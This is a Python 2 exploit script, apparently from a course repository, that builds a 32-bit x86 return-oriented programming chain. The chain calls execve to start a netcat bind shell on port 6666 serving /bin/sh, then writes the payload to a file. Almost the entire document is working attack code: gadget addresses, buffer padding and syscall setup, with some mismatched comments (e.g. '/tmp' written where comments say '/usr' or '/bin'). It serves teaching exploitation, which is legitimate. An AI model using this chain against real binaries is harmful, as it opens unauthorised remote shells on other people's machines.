b5ef4f9a27
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
169 lines
4.6 KiB
Python
169 lines
4.6 KiB
Python
"""
|
|
This is a demo python script that creates a ROP chain to launch nc as:
|
|
> /bin//nc -lnp 6666 -tte /bin//sh
|
|
The gadgets in the following code are based on my machine & binary and as a result you will have to adjust the gadget based on your environment.
|
|
With the latest ROPGadget tool that we used in the class, we get the following ropchain:
|
|
- Step 1 -- Write-what-where gadgets
|
|
|
|
[+] Gadget found: 0x8056d05 mov dword ptr [edx], eax ; ret
|
|
[+] Gadget found: 0x806ee8b pop edx ; ret
|
|
[+] Gadget found: 0x80a8bf6 pop eax ; ret
|
|
[+] Gadget found: 0x80562c0 xor eax, eax ; ret
|
|
|
|
- Step 2 -- Init syscall number gadgets
|
|
|
|
[+] Gadget found: 0x80562c0 xor eax, eax ; ret
|
|
[+] Gadget found: 0x807c32a inc eax ; ret
|
|
|
|
- Step 3 -- Init syscall arguments gadgets
|
|
|
|
[+] Gadget found: 0x80481c9 pop ebx ; ret
|
|
[+] Gadget found: 0x806eeb2 pop ecx ; pop ebx ; ret
|
|
[+] Gadget found: 0x806ee8b pop edx ; ret
|
|
|
|
- Step 4 -- Syscall gadget
|
|
|
|
[+] Gadget found: 0x8049603 int 0x80
|
|
|
|
- Step 5 -- Build the ROP chain
|
|
|
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
|
|
#!/usr/bin/env python
|
|
from struct import pack
|
|
import os
|
|
######################################
|
|
fileName=raw_input("Enter the file name")
|
|
outfile=open(fileName, "wb")
|
|
# this is just to create variables of the gadgets that we will be using
|
|
DATA = 0x080da120
|
|
EDAX0 = pack("<I", 0x08050a88)
|
|
STACK = pack("<I", DATA) # @ .data
|
|
INT80 = pack("<I", 0x08049603) # int 0x80
|
|
MOVISTACK = pack("<I", 0x08056d05) # mov dword ptr [edx], eax ; ret
|
|
INCEAX = pack("<I", 0x0807c32a) # inc eax ; ret
|
|
POPEDX = pack("<I", 0x0806ee8b) # pop edx ; ret
|
|
POPECXEBX = pack("<I", 0x0806eeb2) # pop ecx ; pop ebx ; ret
|
|
POPEAX = pack("<I", 0x080a8bf6) # pop eax ; ret
|
|
XOREAX = pack("<I", 0x080562c0) # xor eax, eax ; ret
|
|
DUMMY = pack("<I", 0x42424242) # padding
|
|
|
|
buff = "\x42" * 32
|
|
buff += "BBBB"*3
|
|
|
|
buff += POPEDX # it's via %ecx we will build our stack.
|
|
buff += STACK # %ecx contain the stack address.
|
|
|
|
buff += POPEAX # Lets put content in an address
|
|
buff += "/tmp" # put "/usr" in %eax
|
|
buff += MOVISTACK # put "/bin" in stack address
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 4) # we change our stack for to point after "/bin"
|
|
|
|
buff += POPEAX # Applying the same for "/nc"
|
|
buff += "//nc"
|
|
buff += MOVISTACK # we place "//nc" after "/bin"
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 9) # we change our stack for to point after "bin//nc"+1
|
|
|
|
# we repeated operation for each argument
|
|
buff += POPEAX
|
|
buff += "-lnp"
|
|
buff += MOVISTACK
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 14)
|
|
|
|
buff += POPEAX
|
|
buff += "6666"
|
|
buff += MOVISTACK
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 19)
|
|
|
|
buff += POPEAX
|
|
buff += "-tte"
|
|
buff += MOVISTACK
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 24)
|
|
|
|
buff += POPEAX
|
|
buff += "/bin"
|
|
buff += MOVISTACK
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 28)
|
|
|
|
buff += POPEAX
|
|
buff += "//sh"
|
|
buff += MOVISTACK
|
|
|
|
#
|
|
# We currently have our list of elements separated by \0
|
|
# Now we must construct our char ** i.e. array 'argguments' of strings
|
|
# arguments=[ @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]
|
|
#
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 60) # shadow stack address (@ of arguments)
|
|
|
|
buff += POPEAX
|
|
buff += pack("<I", DATA) # @ of "/bin//nc" 0th item of arguments[]
|
|
buff += MOVISTACK # we place address of "/bin//nc" in our STACK
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 64) # we shift our Stack Pointer + 4 for the second argument
|
|
|
|
buff += POPEAX
|
|
buff += pack("<I", DATA + 0x9) # @ of "-lnp"
|
|
buff += MOVISTACK # we place address of "-lnp" in our STACK
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 68) # we shift our Stack Pointer + 4 for the 3rd argument
|
|
|
|
buff += POPEAX
|
|
buff += pack("<I", DATA + 0xe) # @ of "6666"
|
|
buff += MOVISTACK # we palce address of "6666" in our STACK
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 72) # we shift our Stack Pointer + 4 for the 4th argument
|
|
|
|
buff += POPEAX
|
|
buff += pack("<I", DATA + 0x13) # @ of "-tte"
|
|
buff += MOVISTACK # we place address of "-tte" in our STACK
|
|
|
|
buff += POPEDX
|
|
buff += pack("<I", DATA + 76) # we shift our Stack Pointer + 4 for the 5th argument
|
|
|
|
buff += POPEAX
|
|
buff += pack("<I", DATA + 0x18) # @ of "/bin//sh"
|
|
buff += MOVISTACK # we place address of "/bin//sh" in our STACK
|
|
|
|
#
|
|
# Now we must implement eax to contain the address of
|
|
# the execve syscall.
|
|
# execve = 0xb
|
|
#
|
|
|
|
buff += XOREAX # %eax is put to zero.
|
|
buff += INCEAX * 11 # %eax is now 0xb
|
|
buff += POPEDX # last pop
|
|
buff += pack("<I", DATA + 48) # edx char *env
|
|
buff += POPECXEBX # last pop
|
|
buff += pack("<I", DATA + 60) # ecx char **arguments
|
|
buff += pack("<I", DATA) # ebx "/usr/bin//nc"
|
|
buff += INT80 # we execute
|
|
outfile.write(buff)
|
|
outfile.close()
|
|
|
|
#print buff
|